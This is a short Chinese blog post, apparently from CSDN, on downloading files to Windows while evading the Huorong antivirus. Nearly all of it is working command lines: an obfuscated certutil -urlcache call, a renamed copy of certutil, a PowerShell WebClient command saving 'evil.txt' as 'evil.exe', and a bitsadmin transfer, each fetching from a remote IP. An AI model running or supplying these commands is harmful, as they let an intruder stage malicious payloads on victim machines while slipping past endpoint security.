windows下载bypass火绒

已于 2023-05-28 09:37:39 修改
阅读量700 收藏 1
点赞数
文章标签: windows 火绒安全 服务器
于 2023-05-24 17:30:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_31812157/article/details/130851788
版权
文章介绍了如何使用certutil的urlcache命令和split参数,以及PowerShell和BITSAdmin工具来规避检测,从指定URL下载文件。示例包括certutil的命令行语法,以及如何将下载的文件重命名和保存到本地。这些技术可能被用于系统管理,但也可能涉及安全绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

certutil已经被检测了但是绕过还是很简单

certutil  -""u""r""l""c""a""c""h""e"" -split -f http://192.168.0.131:5555/2.jpg a.jpg

或者copy出来在运行

copy c:\windows\system32\certutil.exe c.exe
c.exe -urlcache -split -f  http://192.168.0.131:5555/2.jpg  test.aaa

powershell

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe')

Bitsadmin 

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt

K0e1y
关注
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值